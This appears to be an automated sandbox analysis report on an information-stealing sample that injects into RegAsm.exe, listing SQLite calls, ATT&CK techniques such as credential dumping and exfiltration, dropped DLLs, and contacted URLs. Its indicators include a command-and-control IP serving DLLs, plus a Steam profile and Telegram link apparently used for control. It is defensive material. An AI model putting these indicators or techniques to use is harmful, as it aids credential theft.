                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CE5910 sqlite3_mprintf,sqlite3_bind_int64,1_2_19CE5910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CBDB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_19CBDB10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C55C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_19C55C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CBDFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,1_2_19CBDFC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CC1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19CC1FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CE51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19CE51D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CD9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,1_2_19CD9090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CFD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19CFD3B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CE55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19CE55B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D614D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_19D614D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D6D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,1_2_19D6D4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D1D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19D1D610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C78970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_19C78970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C54820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,1_2_19C54820
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D24D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_19D24D40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C78CB0 sqlite3_bind_zeroblob,1_2_19C78CB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C70FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_19C70FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D24140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,1_2_19D24140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CB8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,1_2_19CB8200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C98550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,1_2_19C98550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C78430 sqlite3_bind_int64,1_2_19C78430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C906E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,1_2_19C906E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C68680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,1_2_19C68680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C77810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_19C77810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C6B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,1_2_19C6B400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D237E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19D237E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19D03770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19D03770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C9EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,1_2_19C9EF30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CBE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_19CBE170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CAE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_19CAE090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CAE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,1_2_19CAE200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19C566C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_19C566C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19CBA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,1_2_19CBA6F0
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    411
                    Process Injection
                    1
                    Masquerading
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Screen Capture
                    21
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    Boot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    1
                    Credentials in Registry
                    151
                    Security Software Discovery
                    Remote Desktop Protocol1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)411
                    Process Injection
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares4
                    Data from Local System
                    3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information
                    NTDS12
                    Process Discovery
                    Distributed Component Object ModelInput Capture114
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem54
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe100%AviraHEUR/AGEN.1318542
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\IDHIIJJJKEGI\freebl3.dll0%ReversingLabs
                    C:\ProgramData\IDHIIJJJKEGI\mozglue.dll0%ReversingLabs
                    C:\ProgramData\IDHIIJJJKEGI\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\IDHIIJJJKEGI\nss3.dll0%ReversingLabs
                    C:\ProgramData\IDHIIJJJKEGI\softokn3.dll0%ReversingLabs
                    C:\ProgramData\IDHIIJJJKEGI\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqln[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://95.217.244.99/softokn3.dllcH0%Avira URL Cloudsafe
                    https://95.217.244.99AKFC0%Avira URL Cloudsafe
                    https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
                    https://95.217.244.99/softokn3.dll0%Avira URL Cloudsafe
                    https://95.217.244.90%Avira URL Cloudsafe
                    https://95.217.244.99/sqln.dll0%Avira URL Cloudsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    https://95.217.244.99/17.244.99/0%Avira URL Cloudsafe
                    https://95.217.244.99/0%Avira URL Cloudsafe
                    https://95.217.244.99/softokn3.dll-H0%Avira URL Cloudsafe
                    https://95.217.244.99/nss3.dll0%Avira URL Cloudsafe
                    https://95.217.244.990%Avira URL Cloudsafe
                    https://95.217.244.99/vcruntime140.dll0%Avira URL Cloudsafe
                    https://95.217.244.99/msvcp140.dll0%Avira URL Cloudsafe
                    https://recaptcha.net0%URL Reputationsafe
                    https://95.217.244.99/nss3.dlljL0%Avira URL Cloudsafe
                    https://95.217.244.99EGHJ0%Avira URL Cloudsafe
                    https://95.217.244.99/vcruntime140.dllu0%Avira URL Cloudsafe
                    https://95.217.244.99/mozglue.dll0%Avira URL Cloudsafe
                    https://95.217.244.99/B0%Avira URL Cloudsafe
                    https://95.217.244.99/freebl3.dll0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    23.47.27.74
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://95.217.244.99/softokn3.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://95.217.244.99/sqln.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://steamcommunity.com/profiles/76561199677575543false
                        high
                        https://95.217.244.99/false
                        • Avira URL Cloud: safe
                        unknown
                        https://95.217.244.99/nss3.dllfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://95.217.244.99/vcruntime140.dllfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://95.217.244.99/msvcp140.dllfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://95.217.244.99/mozglue.dllfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://95.217.244.99/freebl3.dllfalse
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabBAAFIJKK.1.drfalse
                          high
                          https://duckduckgo.com/ac/?q=BAAFIJKK.1.drfalse
                            high
                            https://95.217.244.99/softokn3.dllcHRegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://95.217.244.99AKFCRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                              high
                              https://steamcommunity.com/profiles/76561199677575543/badgesRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                high
                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=-zPAhzrcAAqx&l=eRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                  high
                                  https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                    high
                                    https://www.gstatic.cn/recaptcha/RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                      high
                                      https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=englRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                        high
                                        http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                          high
                                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                            high
                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                              high
                                              https://steamcommunity.com/profiles/76561199677575543/inventory/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                high
                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                  high
                                                  https://95.217.244.9RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                    high
                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                      high
                                                      https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                        high
                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                          high
                                                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                            high
                                                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&amRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                              high
                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMMRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                high
                                                                http://www.mozilla.com/en-US/blocklist/mozglue.dll.1.dr, mozglue[1].dll.1.drfalse
                                                                  high
                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                    high
                                                                    https://mozilla.org0/nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                      high
                                                                      http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                        high
                                                                        https://store.steampowered.com/points/shop/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BAAFIJKK.1.drfalse
                                                                            high
                                                                            https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.ecosia.org/newtab/BAAFIJKK.1.drfalse
                                                                                high
                                                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199677575543[1].htm.1.drfalse
                                                                                  high
                                                                                  https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                    high
                                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                      high
                                                                                      https://95.217.244.99/17.244.99/RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.google.com/recaptcha/RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                          high
                                                                                          https://95.217.244.99/softokn3.dll-HRegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                            high
                                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                              high
                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                high
                                                                                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                  high
                                                                                                  https://store.steampowered.com/about/76561199677575543[1].htm.1.drfalse
                                                                                                    high
                                                                                                    https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                      high
                                                                                                      https://t.me/snsb82Atfile.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://95.217.244.9976561199677575543[1].htm.1.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                          high
                                                                                                          https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://steamcommunity.com/market/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                              high
                                                                                                              https://store.steampowered.com/news/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                high
                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BAAFIJKK.1.drfalse
                                                                                                                  high
                                                                                                                  http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                    high
                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                      high
